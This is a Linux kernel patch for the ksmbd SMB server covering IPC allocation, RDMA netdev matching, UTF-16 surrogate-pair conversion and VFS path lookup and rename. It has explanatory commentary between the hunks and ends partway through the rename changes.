+diff --git a/fs/smb/server/transport_ipc.c b/fs/smb/server/transport_ipc.c
+index 40c721f9227e4..b49d47bdafc94 100644
+--- a/fs/smb/server/transport_ipc.c
++++ b/fs/smb/server/transport_ipc.c
+@@ -229,7 +229,7 @@ static struct ksmbd_ipc_msg *ipc_msg_alloc(size_t sz)
+ 	struct ksmbd_ipc_msg *msg;
+ 	size_t msg_sz = sz + sizeof(struct ksmbd_ipc_msg);
+ 
+-	msg = kvmalloc(msg_sz, GFP_KERNEL | __GFP_ZERO);
++	msg = kvzalloc(msg_sz, GFP_KERNEL);
+ 	if (msg)
+ 		msg->sz = sz;
+ 	return msg;
+@@ -268,7 +268,7 @@ static int handle_response(int type, void *payload, size_t sz)
+ 			       entry->type + 1, type);
+ 		}
+ 
+-		entry->response = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
++		entry->response = kvzalloc(sz, GFP_KERNEL);
+ 		if (!entry->response) {
+ 			ret = -ENOMEM;
+ 			break;
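Both allocation changes in this file are behavior-preserving: kvzalloc(sz, GFP_KERNEL) is defined as kvmalloc(sz, GFP_KERNEL | __GFP_ZERO), but it states the zeroing intent directly and matches the kzalloc naming convention, so readers and static checkers no longer have to verify that __GFP_ZERO survives the kmalloc-or-vmalloc fallback:

msg = kvzalloc(msg_sz, GFP_KERNEL);  /* == kvmalloc(msg_sz, GFP_KERNEL | __GFP_ZERO) */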
+diff --git a/fs/smb/server/transport_rdma.c b/fs/smb/server/transport_rdma.c
+index 7578200f63b1d..c5629a68c8b73 100644
+--- a/fs/smb/server/transport_rdma.c
++++ b/fs/smb/server/transport_rdma.c
+@@ -1241,14 +1241,12 @@ static int smb_direct_writev(struct ksmbd_transport *t,
+ 
+ 	//FIXME: skip RFC1002 header..
+ 	buflen -= 4;
+-	iov[0].iov_base += 4;
+-	iov[0].iov_len -= 4;
+ 
+ 	remaining_data_length = buflen;
+ 	ksmbd_debug(RDMA, "Sending smb (RDMA): smb_len=%u\n", buflen);
+ 
+ 	smb_direct_send_ctx_init(st, &send_ctx, need_invalidate, remote_key);
+-	start = i = 0;
++	start = i = 1;
+ 	buflen = 0;
+ 	while (true) {
+ 		buflen += iov[i].iov_len;
+@@ -2142,8 +2140,7 @@ static int smb_direct_ib_client_add(struct ib_device *ib_dev)
+ 	if (ib_dev->node_type != RDMA_NODE_IB_CA)
+ 		smb_direct_port = SMB_DIRECT_PORT_IWARP;
+ 
+-	if (!ib_dev->ops.get_netdev ||
+-	    !rdma_frwr_is_supported(&ib_dev->attrs))
++	if (!rdma_frwr_is_supported(&ib_dev->attrs))
+ 		return 0;
+ 
+ 	smb_dev = kzalloc(sizeof(*smb_dev), GFP_KERNEL);
+@@ -2243,17 +2240,38 @@ bool ksmbd_rdma_capable_netdev(struct net_device *netdev)
+ 		for (i = 0; i < smb_dev->ib_dev->phys_port_cnt; i++) {
+ 			struct net_device *ndev;
+ 
+-			ndev = smb_dev->ib_dev->ops.get_netdev(smb_dev->ib_dev,
+-							       i + 1);
+-			if (!ndev)
+-				continue;
++			if (smb_dev->ib_dev->ops.get_netdev) {
++				ndev = smb_dev->ib_dev->ops.get_netdev(
++					smb_dev->ib_dev, i + 1);
++				if (!ndev)
++					continue;
+ 
+-			if (ndev == netdev) {
++				if (ndev == netdev) {
++					dev_put(ndev);
++					rdma_capable = true;
++					goto out;
++				}
+ 				dev_put(ndev);
+-				rdma_capable = true;
+-				goto out;
++			/* if ib_dev does not implement ops.get_netdev
++			 * check for matching infiniband GUID in hw_addr
++			 */
++			} else if (netdev->type == ARPHRD_INFINIBAND) {
++				struct netdev_hw_addr *ha;
++				union ib_gid gid;
++				u32 port_num;
++				int ret;
++
++				netdev_hw_addr_list_for_each(
++					ha, &netdev->dev_addrs) {
++					memcpy(&gid, ha->addr + 4, sizeof(gid));
++					ret = ib_find_gid(smb_dev->ib_dev, &gid,
++							  &port_num, NULL);
++					if (!ret) {
++						rdma_capable = true;
++						goto out;
++					}
++				}
+ 			}
+-			dev_put(ndev);
+ 		}
+ 	}
+ out:
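The ksmbd_rdma_capable_netdev() fallback above handles RDMA providers that do not implement ops.get_netdev. For those, the match runs the other way around: an IPoIB interface's 20-byte hardware address carries the port GID in bytes 4..19, so the code lifts the GID out of each netdev address and asks the ib_device whether it owns it. Sketched, assuming the standard IPoIB link-layer address layout:

/* IPoIB hardware address (20 bytes):
 *   bytes 0..3   QPN and flags
 *   bytes 4..19  port GID (union ib_gid)
 */
union ib_gid gid;
u32 port_num;

memcpy(&gid, ha->addr + 4, sizeof(gid));
if (!ib_find_gid(smb_dev->ib_dev, &gid, &port_num, NULL))
        rdma_capable = true;    /* this ib_device backs the netdev */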
+diff --git a/fs/smb/server/unicode.c b/fs/smb/server/unicode.c
+index a0db699ddafda..33fc6d45c0f38 100644
+--- a/fs/smb/server/unicode.c
++++ b/fs/smb/server/unicode.c
+@@ -14,46 +14,10 @@
+ #include "uniupr.h"
+ #include "smb_common.h"
+ 
+-/*
+- * smb_utf16_bytes() - how long will a string be after conversion?
+- * @from:	pointer to input string
+- * @maxbytes:	don't go past this many bytes of input string
+- * @codepage:	destination codepage
+- *
+- * Walk a utf16le string and return the number of bytes that the string will
+- * be after being converted to the given charset, not including any null
+- * termination required. Don't walk past maxbytes in the source buffer.
+- *
+- * Return:	string length after conversion
+- */
+-static int smb_utf16_bytes(const __le16 *from, int maxbytes,
+-			   const struct nls_table *codepage)
+-{
+-	int i;
+-	int charlen, outlen = 0;
+-	int maxwords = maxbytes / 2;
+-	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp;
+-
+-	for (i = 0; i < maxwords; i++) {
+-		ftmp = get_unaligned_le16(&from[i]);
+-		if (ftmp == 0)
+-			break;
+-
+-		charlen = codepage->uni2char(ftmp, tmp, NLS_MAX_CHARSET_SIZE);
+-		if (charlen > 0)
+-			outlen += charlen;
+-		else
+-			outlen++;
+-	}
+-
+-	return outlen;
+-}
+-
+ /*
+  * cifs_mapchar() - convert a host-endian char to proper char in codepage
+  * @target:	where converted character should be copied
+- * @src_char:	2 byte host-endian source character
++ * @from:	host-endian source string
+  * @cp:		codepage to which character should be converted
+  * @mapchar:	should character be mapped according to mapchars mount option?
+  *
+@@ -64,10 +28,13 @@ static int smb_utf16_bytes(const __le16 *from, int maxbytes,
+  * Return:	string length after conversion
+  */
+ static int
+-cifs_mapchar(char *target, const __u16 src_char, const struct nls_table *cp,
++cifs_mapchar(char *target, const __u16 *from, const struct nls_table *cp,
+ 	     bool mapchar)
+ {
+ 	int len = 1;
++	__u16 src_char;
++
++	src_char = *from;
+ 
+ 	if (!mapchar)
+ 		goto cp_convert;
+@@ -105,30 +72,66 @@ out:
+ 
+ cp_convert:
+ 	len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE);
+-	if (len <= 0) {
+-		*target = '?';
+-		len = 1;
+-	}
++	if (len <= 0)
++		goto surrogate_pair;
++
++	goto out;
++
++surrogate_pair:
++	/* convert SURROGATE_PAIR and IVS */
++	if (strcmp(cp->charset, "utf8"))
++		goto unknown;
++	len = utf16s_to_utf8s(from, 3, UTF16_LITTLE_ENDIAN, target, 6);
++	if (len <= 0)
++		goto unknown;
++	return len;
+ 
++unknown:
++	*target = '?';
++	len = 1;
+ 	goto out;
+ }
+ 
+ /*
+- * is_char_allowed() - check for valid character
+- * @ch:		input character to be checked
++ * smb_utf16_bytes() - compute converted string length
++ * @from:	pointer to input string
++ * @maxbytes:	input string length
++ * @codepage:	destination codepage
++ *
++ * Walk a utf16le string and return the number of bytes that the string will
++ * be after being converted to the given charset, not including any null
++ * termination required. Don't walk past maxbytes in the source buffer.
+  *
+- * Return:	1 if char is allowed, otherwise 0
++ * Return:	string length after conversion
+  */
+-static inline int is_char_allowed(char *ch)
++static int smb_utf16_bytes(const __le16 *from, int maxbytes,
++			   const struct nls_table *codepage)
+ {
+-	/* check for control chars, wildcards etc. */
+-	if (!(*ch & 0x80) &&
+-	    (*ch <= 0x1f ||
+-	     *ch == '?' || *ch == '"' || *ch == '<' ||
+-	     *ch == '>' || *ch == '|'))
+-		return 0;
+-
+-	return 1;
++	int i, j;
++	int charlen, outlen = 0;
++	int maxwords = maxbytes / 2;
++	char tmp[NLS_MAX_CHARSET_SIZE];
++	__u16 ftmp[3];
++
++	for (i = 0; i < maxwords; i++) {
++		ftmp[0] = get_unaligned_le16(&from[i]);
++		if (ftmp[0] == 0)
++			break;
++		for (j = 1; j <= 2; j++) {
++			if (i + j < maxwords)
++				ftmp[j] = get_unaligned_le16(&from[i + j]);
++			else
++				ftmp[j] = 0;
++		}
++
++		charlen = cifs_mapchar(tmp, ftmp, codepage, 0);
++		if (charlen > 0)
++			outlen += charlen;
++		else
++			outlen++;
++	}
++
++	return outlen;
+ }
+ 
+ /*
+@@ -158,12 +161,12 @@ static inline int is_char_allowed(char *ch)
+ static int smb_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+ 			  const struct nls_table *codepage, bool mapchar)
+ {
+-	int i, charlen, safelen;
++	int i, j, charlen, safelen;
+ 	int outlen = 0;
+ 	int nullsize = nls_nullsize(codepage);
+ 	int fromwords = fromlen / 2;
+ 	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp;
++	__u16 ftmp[3];	/* ftmp[3] = 3array x 2bytes = 6bytes UTF-16 */
+ 
+ 	/*
+ 	 * because the chars can be of varying widths, we need to take care
+@@ -174,9 +177,15 @@ static int smb_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+ 	safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize);
+ 
+ 	for (i = 0; i < fromwords; i++) {
+-		ftmp = get_unaligned_le16(&from[i]);
+-		if (ftmp == 0)
++		ftmp[0] = get_unaligned_le16(&from[i]);
++		if (ftmp[0] == 0)
+ 			break;
++		for (j = 1; j <= 2; j++) {
++			if (i + j < fromwords)
++				ftmp[j] = get_unaligned_le16(&from[i + j]);
++			else
++				ftmp[j] = 0;
++		}
+ 
+ 		/*
+ 		 * check to see if converting this character might make the
+@@ -191,6 +200,19 @@ static int smb_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+ 		/* put converted char into 'to' buffer */
+ 		charlen = cifs_mapchar(&to[outlen], ftmp, codepage, mapchar);
+ 		outlen += charlen;
++
++		/*
++		 * charlen (=bytes of UTF-8 for 1 character)
++		 * 4bytes UTF-8(surrogate pair) is charlen=4
++		 * (4bytes UTF-16 code)
++		 * 7-8bytes UTF-8(IVS) is charlen=3+4 or 4+4
++		 * (2 UTF-8 pairs divided to 2 UTF-16 pairs)
++		 */
++		if (charlen == 4)
++			i++;
++		else if (charlen >= 5)
++			/* 5-6bytes UTF-8 */
++			i += 2;
+ 	}
+ 
+ 	/* properly null-terminate string */
+@@ -325,6 +347,9 @@ int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
+ 	char src_char;
+ 	__le16 dst_char;
+ 	wchar_t tmp;
++	wchar_t wchar_to[6];	/* UTF-16 */
++	int ret;
++	unicode_t u;
+ 
+ 	if (!mapchars)
+ 		return smb_strtoUTF16(target, source, srclen, cp);
+@@ -367,11 +392,57 @@ int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
+ 			 * if no match, use question mark, which at least in
+ 			 * some cases serves as wild card
+ 			 */
+-			if (charlen < 1) {
+-				dst_char = cpu_to_le16(0x003f);
+-				charlen = 1;
++			if (charlen > 0)
++				goto ctoUTF16;
++
++			/* convert SURROGATE_PAIR */
++			if (strcmp(cp->charset, "utf8"))
++				goto unknown;
++			if (*(source + i) & 0x80) {
++				charlen = utf8_to_utf32(source + i, 6, &u);
++				if (charlen < 0)
++					goto unknown;
++			} else
++				goto unknown;
++			ret  = utf8s_to_utf16s(source + i, charlen,
++					UTF16_LITTLE_ENDIAN,
++					wchar_to, 6);
++			if (ret < 0)
++				goto unknown;
++
++			i += charlen;
++			dst_char = cpu_to_le16(*wchar_to);
++			if (charlen <= 3)
++				/* 1-3bytes UTF-8 to 2bytes UTF-16 */
++				put_unaligned(dst_char, &target[j]);
++			else if (charlen == 4) {
++				/*
++				 * 4bytes UTF-8(surrogate pair) to 4bytes UTF-16
++				 * 7-8bytes UTF-8(IVS) divided to 2 UTF-16
++				 * (charlen=3+4 or 4+4)
++				 */
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 1));
++				j++;
++				put_unaligned(dst_char, &target[j]);
++			} else if (charlen >= 5) {
++				/* 5-6bytes UTF-8 to 6bytes UTF-16 */
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 1));
++				j++;
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 2));
++				j++;
++				put_unaligned(dst_char, &target[j]);
+ 			}
++			continue;
++
++unknown:
++			dst_char = cpu_to_le16(0x003f);
++			charlen = 1;
+ 		}
++
++ctoUTF16:
+ 		/*
+ 		 * character may take more than one byte in the source string,
+ 		 * but will take exactly two bytes in the target string
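The surrogate-pair plumbing above follows directly from UTF-16 encoding: code points above U+FFFF take two 16-bit units, and an ideographic variation sequence appends a variation selector that is itself a pair, which is why the helpers now read up to three units of lookahead (ftmp[3]) and advance the input cursor by however many extra words were consumed. A worked example for U+1F600:

unsigned int   cp = 0x1F600 - 0x10000;      /* 0x0F600                 */
unsigned short hi = 0xD800 + (cp >> 10);    /* 0xD83D (high surrogate) */
unsigned short lo = 0xDC00 + (cp & 0x3FF);  /* 0xDE00 (low surrogate)  */

/* utf16s_to_utf8s() on { 0xD83D, 0xDE00 } emits the 4 UTF-8 bytes
 * F0 9F 98 80, so cifs_mapchar() returns charlen == 4 and the caller
 * skips one extra input word (i++), keeping both cursors in step. */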
+diff --git a/fs/smb/server/vfs.c b/fs/smb/server/vfs.c
+index 36914db8b6616..fe2c80ea2e47e 100644
+--- a/fs/smb/server/vfs.c
++++ b/fs/smb/server/vfs.c
+@@ -17,6 +17,7 @@
+ #include <linux/vmalloc.h>
+ #include <linux/sched/xacct.h>
+ #include <linux/crc32c.h>
++#include <linux/namei.h>
+ 
+ #include "../../internal.h"	/* for vfs_path_lookup */
+ 
+@@ -36,19 +37,6 @@
+ #include "mgmt/user_session.h"
+ #include "mgmt/user_config.h"
+ 
+-static char *extract_last_component(char *path)
+-{
+-	char *p = strrchr(path, '/');
+-
+-	if (p && p[1] != '\0') {
+-		*p = '\0';
+-		p++;
+-	} else {
+-		p = NULL;
+-	}
+-	return p;
+-}
+-
+ static void ksmbd_vfs_inherit_owner(struct ksmbd_work *work,
+ 				    struct inode *parent_inode,
+ 				    struct inode *inode)
+@@ -62,67 +50,96 @@ static void ksmbd_vfs_inherit_owner(struct ksmbd_work *work,
+ 
+ /**
+  * ksmbd_vfs_lock_parent() - lock parent dentry if it is stable
+- *
+- * the parent dentry got by dget_parent or @parent could be
+- * unstable, we try to lock a parent inode and lookup the
+- * child dentry again.
+- *
+- * the reference count of @parent isn't incremented.
+  */
+-int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
+-			  struct dentry *child)
++int ksmbd_vfs_lock_parent(struct dentry *parent, struct dentry *child)
+ {
+-	struct dentry *dentry;
+-	int ret = 0;
+-
+ 	inode_lock_nested(d_inode(parent), I_MUTEX_PARENT);
+-	dentry = lookup_one(user_ns, child->d_name.name, parent,
+-			    child->d_name.len);
+-	if (IS_ERR(dentry)) {
+-		ret = PTR_ERR(dentry);
+-		goto out_err;
+-	}
+-
+-	if (dentry != child) {
+-		ret = -ESTALE;
+-		dput(dentry);
+-		goto out_err;
++	if (child->d_parent != parent) {
++		inode_unlock(d_inode(parent));
++		return -ENOENT;
+ 	}
+ 
+-	dput(dentry);
+ 	return 0;
+-out_err:
+-	inode_unlock(d_inode(parent));
+-	return ret;
+ }
+ 
+-int ksmbd_vfs_may_delete(struct user_namespace *user_ns,
+-			 struct dentry *dentry)
++static int ksmbd_vfs_path_lookup_locked(struct ksmbd_share_config *share_conf,
++					char *pathname, unsigned int flags,
++					struct path *parent_path,
++					struct path *path)
+ {
+-	struct dentry *parent;
+-	int ret;
++	struct qstr last;
++	struct filename *filename;
++	struct path *root_share_path = &share_conf->vfs_path;
++	int err, type;
++	struct dentry *d;
++
++	if (pathname[0] == '\0') {
++		pathname = share_conf->path;
++		root_share_path = NULL;
++	} else {
++		flags |= LOOKUP_BENEATH;
++	}
++
++	filename = getname_kernel(pathname);
++	if (IS_ERR(filename))
++		return PTR_ERR(filename);
+ 
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
++	err = vfs_path_parent_lookup(filename, flags,
++				     parent_path, &last, &type,
++				     root_share_path);
++	if (err) {
++		putname(filename);
++		return err;
+ 	}
+ 
+-	ret = inode_permission(user_ns, d_inode(parent),
+-			       MAY_EXEC | MAY_WRITE);
++	if (unlikely(type != LAST_NORM)) {
++		path_put(parent_path);
++		putname(filename);
++		return -ENOENT;
++	}
+ 
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	return ret;
++	err = mnt_want_write(parent_path->mnt);
++	if (err) {
++		path_put(parent_path);
++		putname(filename);
++		return -ENOENT;
++	}
++
++	inode_lock_nested(parent_path->dentry->d_inode, I_MUTEX_PARENT);
++	d = lookup_one_qstr_excl(&last, parent_path->dentry, 0);
++	if (IS_ERR(d))
++		goto err_out;
++
++	if (d_is_negative(d)) {
++		dput(d);
++		goto err_out;
++	}
++
++	path->dentry = d;
++	path->mnt = mntget(parent_path->mnt);
++
++	if (test_share_config_flag(share_conf, KSMBD_SHARE_FLAG_CROSSMNT)) {
++		err = follow_down(path);
++		if (err < 0) {
++			path_put(path);
++			goto err_out;
++		}
++	}
++
++	putname(filename);
++	return 0;
++
++err_out:
++	inode_unlock(d_inode(parent_path->dentry));
++	mnt_drop_write(parent_path->mnt);
++	path_put(parent_path);
++	putname(filename);
++	return -ENOENT;
+ }
+ 
+-int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
++void ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
+ 				   struct dentry *dentry, __le32 *daccess)
+ {
+-	struct dentry *parent;
+-	int ret = 0;
+-
+ 	*daccess = cpu_to_le32(FILE_READ_ATTRIBUTES | READ_CONTROL);
+ 
+ 	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_WRITE))
+@@ -137,19 +154,8 @@ int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
+ 	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_EXEC))
+ 		*daccess |= FILE_EXECUTE_LE;
+ 
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
+-	}
+-
+-	if (!inode_permission(user_ns, d_inode(parent), MAY_EXEC | MAY_WRITE))
++	if (!inode_permission(user_ns, d_inode(dentry->d_parent), MAY_EXEC | MAY_WRITE))
+ 		*daccess |= FILE_DELETE_LE;
+-
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	return ret;
+ }
+ 
+ /**
+@@ -185,6 +191,7 @@ int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode)
+ 	} else {
+ 		pr_err("File(%s): creation failed (err:%d)\n", name, err);
+ 	}
++
+ 	done_path_create(&path, dentry);
+ 	return err;
+ }
+@@ -218,27 +225,26 @@ int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode)
+ 	user_ns = mnt_user_ns(path.mnt);
+ 	mode |= S_IFDIR;
+ 	err = vfs_mkdir(user_ns, d_inode(path.dentry), dentry, mode);
+-	if (err) {
+-		goto out;
+-	} else if (d_unhashed(dentry)) {
++	if (!err && d_unhashed(dentry)) {
+ 		struct dentry *d;
+ 
+ 		d = lookup_one(user_ns, dentry->d_name.name, dentry->d_parent,
+ 			       dentry->d_name.len);
+ 		if (IS_ERR(d)) {
+ 			err = PTR_ERR(d);
+-			goto out;
++			goto out_err;
+ 		}
+ 		if (unlikely(d_is_negative(d))) {
+ 			dput(d);
+ 			err = -ENOENT;
+-			goto out;
++			goto out_err;
+ 		}
+ 
+ 		ksmbd_vfs_inherit_owner(work, d_inode(path.dentry), d_inode(d));
+ 		dput(d);
+ 	}
+-out:
++
++out_err:
+ 	done_path_create(&path, dentry);
+ 	if (err)
+ 		pr_err("mkdir(%s): creation failed (err:%d)\n", name, err);
+@@ -358,15 +364,15 @@ out:
+  * @fid:	file id of open file
+  * @count:	read byte count
+  * @pos:	file pos
++ * @rbuf:	read data buffer
+  *
+  * Return:	number of read bytes on success, otherwise error
+  */
+ int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp, size_t count,
+-		   loff_t *pos)
++		   loff_t *pos, char *rbuf)
+ {
+ 	struct file *filp = fp->filp;
+ 	ssize_t nbytes = 0;
+-	char *rbuf = work->aux_payload_buf;
+ 	struct inode *inode = file_inode(filp);
+ 
+ 	if (S_ISDIR(inode->i_mode))
+@@ -410,7 +416,8 @@ static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
+ {
+ 	char *stream_buf = NULL, *wbuf;
+ 	struct user_namespace *user_ns = file_mnt_user_ns(fp->filp);
+-	size_t size, v_len;
++	size_t size;
++	ssize_t v_len;
+ 	int err = 0;
+ 
+ 	ksmbd_debug(VFS, "write stream data pos : %llu, count : %zd\n",
+@@ -427,14 +434,14 @@ static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
+ 				       fp->stream.name,
+ 				       fp->stream.size,
+ 				       &stream_buf);
+-	if ((int)v_len < 0) {
++	if (v_len < 0) {
+ 		pr_err("not found stream in xattr : %zd\n", v_len);
+-		err = (int)v_len;
++		err = v_len;
+ 		goto out;
+ 	}
+ 
+ 	if (v_len < size) {
+-		wbuf = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
++		wbuf = kvzalloc(size, GFP_KERNEL);
+ 		if (!wbuf) {
+ 			err = -ENOMEM;
+ 			goto out;
+@@ -449,11 +456,12 @@ static int ksmbd_vfs_stream_write(struct ksmbd_file *fp, char *buf, loff_t *pos,
+ 	memcpy(&stream_buf[*pos], buf, count);
+ 
+ 	err = ksmbd_vfs_setxattr(user_ns,
+-				 fp->filp->f_path.dentry,
++				 &fp->filp->f_path,
+ 				 fp->stream.name,
+ 				 (void *)stream_buf,
+ 				 size,
+-				 0);
++				 0,
++				 true);
+ 	if (err < 0)
+ 		goto out;
+ 
+@@ -510,6 +518,9 @@ int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 		}
+ 	}
+ 
++	/* Reserve lease break for parent dir at closing time */
++	fp->reserve_lease_break = true;
++
+ 	/* Do we need to break any of a levelII oplock? */
+ 	smb_break_all_levII_oplock(work, fp, 1);
+ 
+@@ -581,54 +592,32 @@ int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id)
+  *
+  * Return:	0 on success, otherwise error
+  */
+-int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name)
++int ksmbd_vfs_remove_file(struct ksmbd_work *work, const struct path *path)
+ {
+ 	struct user_namespace *user_ns;
+-	struct path path;
+-	struct dentry *parent;
++	struct dentry *parent = path->dentry->d_parent;
+ 	int err;
+ 
+ 	if (ksmbd_override_fsids(work))
+ 		return -ENOMEM;
+ 
+-	err = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, false);
+-	if (err) {
+-		ksmbd_debug(VFS, "can't get %s, err %d\n", name, err);
+-		ksmbd_revert_fsids(work);
+-		return err;
+-	}
+-
+-	user_ns = mnt_user_ns(path.mnt);
+-	parent = dget_parent(path.dentry);
+-	err = ksmbd_vfs_lock_parent(user_ns, parent, path.dentry);
+-	if (err) {
+-		dput(parent);
+-		path_put(&path);
+-		ksmbd_revert_fsids(work);
+-		return err;
+-	}
+-
+-	if (!d_inode(path.dentry)->i_nlink) {
++	if (!d_inode(path->dentry)->i_nlink) {
+ 		err = -ENOENT;
+ 		goto out_err;
+ 	}
+ 
+-	if (S_ISDIR(d_inode(path.dentry)->i_mode)) {
+-		err = vfs_rmdir(user_ns, d_inode(parent), path.dentry);
++	user_ns = mnt_user_ns(path->mnt);
++	if (S_ISDIR(d_inode(path->dentry)->i_mode)) {
++		err = vfs_rmdir(user_ns, d_inode(parent), path->dentry);
+ 		if (err && err != -ENOTEMPTY)
+-			ksmbd_debug(VFS, "%s: rmdir failed, err %d\n", name,
+-				    err);
++			ksmbd_debug(VFS, "rmdir failed, err %d\n", err);
+ 	} else {
+-		err = vfs_unlink(user_ns, d_inode(parent), path.dentry, NULL);
++		err = vfs_unlink(user_ns, d_inode(parent), path->dentry, NULL);
+ 		if (err)
+-			ksmbd_debug(VFS, "%s: unlink failed, err %d\n", name,
+-				    err);
++			ksmbd_debug(VFS, "unlink failed, err %d\n", err);
+ 	}
+ 
+ out_err:
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	path_put(&path);
+ 	ksmbd_revert_fsids(work);
+ 	return err;
+ }
+@@ -687,149 +676,120 @@ out1:
+ 	return err;
+ }
+ 
+-static int ksmbd_validate_entry_in_use(struct dentry *src_dent)
++int ksmbd_vfs_rename(struct ksmbd_work *work, const struct path *old_path,
++		     char *newname, int flags)
+ {
+-	struct dentry *dst_dent;
++	struct dentry *old_parent, *new_dentry, *trap;
++	struct dentry *old_child = old_path->dentry;
++	struct path new_path;
++	struct qstr new_last;
++	struct renamedata rd;
++	struct filename *to;
++	struct ksmbd_share_config *share_conf = work->tcon->share_conf;
++	struct ksmbd_file *parent_fp;
++	int new_type;
++	int err, lookup_flags = LOOKUP_NO_SYMLINKS;
++
++	if (ksmbd_override_fsids(work))
++		return -ENOMEM;
+ 
+-	spin_lock(&src_dent->d_lock);
+-	list_for_each_entry(dst_dent, &src_dent->d_subdirs, d_child) {
+-		struct ksmbd_file *child_fp;
++	to = getname_kernel(newname);
++	if (IS_ERR(to)) {
++		err = PTR_ERR(to);
++		goto revert_fsids;
++	}
+ 
+-		if (d_really_is_negative(dst_dent))
+-			continue;
++retry:
++	err = vfs_path_parent_lookup(to, lookup_flags | LOOKUP_BENEATH,
++				     &new_path, &new_last, &new_type,
++				     &share_conf->vfs_path);
++	if (err)
++		goto out1;
+ 
+-		child_fp = ksmbd_lookup_fd_inode(d_inode(dst_dent));
+-		if (child_fp) {
+-			spin_unlock(&src_dent->d_lock);
+-			ksmbd_debug(VFS, "Forbid rename, sub file/dir is in use\n");
+-			return -EACCES;
+-		}
++	if (old_path->mnt != new_path.mnt) {
++		err = -EXDEV;
++		goto out2;
+ 	}
+-	spin_unlock(&src_dent->d_lock);
+ 
+-	return 0;
+-}
++	err = mnt_want_write(old_path->mnt);
++	if (err)
++		goto out2;
+ 
+-static int __ksmbd_vfs_rename(struct ksmbd_work *work,
+-			      struct user_namespace *src_user_ns,
+-			      struct dentry *src_dent_parent,
+-			      struct dentry *src_dent,
+-			      struct user_namespace *dst_user_ns,
+-			      struct dentry *dst_dent_parent,
+-			      struct dentry *trap_dent,
+-			      char *dst_name)
+-{
+-	struct dentry *dst_dent;
+-	int err;
++	trap = lock_rename_child(old_child, new_path.dentry);
+ 
+-	if (!work->tcon->posix_extensions) {
+-		err = ksmbd_validate_entry_in_use(src_dent);
+-		if (err)
+-			return err;
++	old_parent = dget(old_child->d_parent);
++	if (d_unhashed(old_child)) {
++		err = -EINVAL;
++		goto out3;
+ 	}
+ 
+-	if (d_really_is_negative(src_dent_parent))
+-		return -ENOENT;
+-	if (d_really_is_negative(dst_dent_parent))
+-		return -ENOENT;
+-	if (d_really_is_negative(src_dent))
+-		return -ENOENT;
+-	if (src_dent == trap_dent)
+-		return -EINVAL;
+-
+-	if (ksmbd_override_fsids(work))
+-		return -ENOMEM;
++	parent_fp = ksmbd_lookup_fd_inode(old_child->d_parent);
++	if (parent_fp) {
++		if (parent_fp->daccess & FILE_DELETE_LE) {
++			pr_err("parent dir is opened with delete access\n");
++			err = -ESHARE;
++			ksmbd_fd_put(work, parent_fp);
++			goto out3;
++		}
++		ksmbd_fd_put(work, parent_fp);
++	}
+ 
+-	dst_dent = lookup_one(dst_user_ns, dst_name, dst_dent_parent,
+-			      strlen(dst_name));
+-	err = PTR_ERR(dst_dent);
+-	if (IS_ERR(dst_dent)) {
+-		pr_err("lookup failed %s [%d]\n", dst_name, err);
+-		goto out;
++	new_dentry = lookup_one_qstr_excl(&new_last, new_path.dentry,
++					  lookup_flags | LOOKUP_RENAME_TARGET);
++	if (IS_ERR(new_dentry)) {
++		err = PTR_ERR(new_dentry);
++		goto out3;
+ 	}
+ 
+-	err = -ENOTEMPTY;
+-	if (dst_dent != trap_dent && !d_really_is_positive(dst_dent)) {
+-		struct renamedata rd = {
+-			.old_mnt_userns	= src_user_ns,
+-			.old_dir	= d_inode(src_dent_parent),
+-			.old_dentry	= src_dent,
+-			.new_mnt_userns	= dst_user_ns,
+-			.new_dir	= d_inode(dst_dent_parent),
+-			.new_dentry	= dst_dent,
+-		};
+-		err = vfs_rename(&rd);
++	if (d_is_symlink(new_dentry)) {
++		err = -EACCES;
++		goto out4;
+ 	}
+-	if (err)
+-		pr_err("vfs_rename failed err %d\n", err);
+-	if (dst_dent)
+-		dput(dst_dent);
+-out:
+-	ksmbd_revert_fsids(work);
+-	return err;
+-}
+ 
+-int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			char *newname)
+-{
+-	struct user_namespace *user_ns;
+-	struct path dst_path;
+-	struct dentry *src_dent_parent, *dst_dent_parent;
+-	struct dentry *src_dent, *trap_dent, *src_child;
